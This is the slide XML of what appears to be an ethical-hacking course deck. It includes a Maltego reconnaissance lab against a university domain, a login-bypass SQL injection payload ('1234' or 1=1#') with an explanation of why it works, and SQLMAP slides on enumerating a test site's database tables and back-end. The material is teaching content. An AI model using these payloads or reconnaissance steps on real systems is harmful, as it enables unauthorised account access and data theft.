          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If any how we try to make that password condition true we will get into the user account without its password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3076435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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lab Experiment No 1: Run Machine, Go to Company Stalker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego jainuniversity.ac.in</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="312" name="Google Shape;312;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1440400"/>
            <a:ext cx="9144000" cy="370310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21933" y="585627"/>
            <a:ext cx="6527749" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here we are injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> command with 1234’ or 1=1#’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here we are using wrong password 1234 with or and one (1=1) right condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So here what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> does is it will see or condition where if one is true all are true </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As 1=1 is true it will be correctly executed and we get access to the user account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216" y="2126430"/>
            <a:ext cx="8229600" cy="2000250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10437277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9884"/>
            <a:ext cx="9144000" cy="3571986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482885" y="493160"/>
            <a:ext cx="4055919" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>While inserting fake password as shown in figure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27437057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5093"/>
            <a:ext cx="9144000" cy="3508338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441789" y="431515"/>
            <a:ext cx="6691255" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As you can see in diagram here we get into the user account with that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90106525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207"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1817694" y="97632"/>
            <a:ext cx="5075700" cy="8574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en" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLMAP TOOL</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1412" name="Google Shape;1412;p207"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405000" y="1043950"/>
            <a:ext cx="8527200" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="254000" lvl="0" indent="-292100" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Where the ‘GET’ parameter is in bold, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cat=1 means the value of it can be modified and it can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sql vulnerability.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1413" name="Google Shape;1413;p207"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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183</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1414" name="Google Shape;1414;p207"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="20267" b="75819"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="667409" y="3598325"/>
            <a:ext cx="5120060" cy="1175705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1415" name="Google Shape;1415;p207"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-2730446">
            <a:off x="6837233" y="3386981"/>
            <a:ext cx="2036516" cy="1238202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1416" name="Google Shape;1416;p207"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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208"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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184</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1422" name="Google Shape;1422;p208"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1423" name="Google Shape;1423;p208"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1424" name="Google Shape;1424;p208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1815666"/>
            <a:ext cx="9000600" cy="2052300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat"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1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1425" name="Google Shape;1425;p208"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6030162" y="2139702"/>
            <a:ext cx="2656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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Payloads executed</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1426" name="Google Shape;1426;p208"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="4569972"/>
            <a:ext cx="2106300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FDD20F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1427" name="Google Shape;1427;p208"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977934" y="4431473"/>
            <a:ext cx="18363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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Database available </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1428" name="Google Shape;1428;p208"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="4245936"/>
            <a:ext cx="2106300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FDD20F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1429" name="Google Shape;1429;p208"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4110642" y="4107437"/>
            <a:ext cx="18363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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Back-end </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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209"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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185</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1435" name="Google Shape;1435;p209"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1521"/>
            <a:ext cx="9134232" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1436" name="Google Shape;1436;p209"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5868144" y="1707654"/>
            <a:ext cx="2656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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Payloads executed</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1437" name="Google Shape;1437;p209"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007604" y="4191930"/>
            <a:ext cx="1674300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FDD20F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1438" name="Google Shape;1438;p209"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681790" y="4041047"/>
            <a:ext cx="26565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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Tables available in acuart database</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;1439;p209"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1482813"/>
            <a:ext cx="9000600" cy="1683000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat"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1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1440" name="Google Shape;1440;p209"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2897814" y="3327834"/>
            <a:ext cx="1674300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FDD20F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p209"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707904" y="3435846"/>
            <a:ext cx="864000" cy="378000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FDD20F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p209"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572812" y="3228910"/>
            <a:ext cx="37797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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Os in which web server is running</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1443" name="Google Shape;1443;p209"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572812" y="3634543"/>
            <a:ext cx="31317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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Technology used in web bulding</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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210"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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186</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1449" name="Google Shape;1449;p210"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
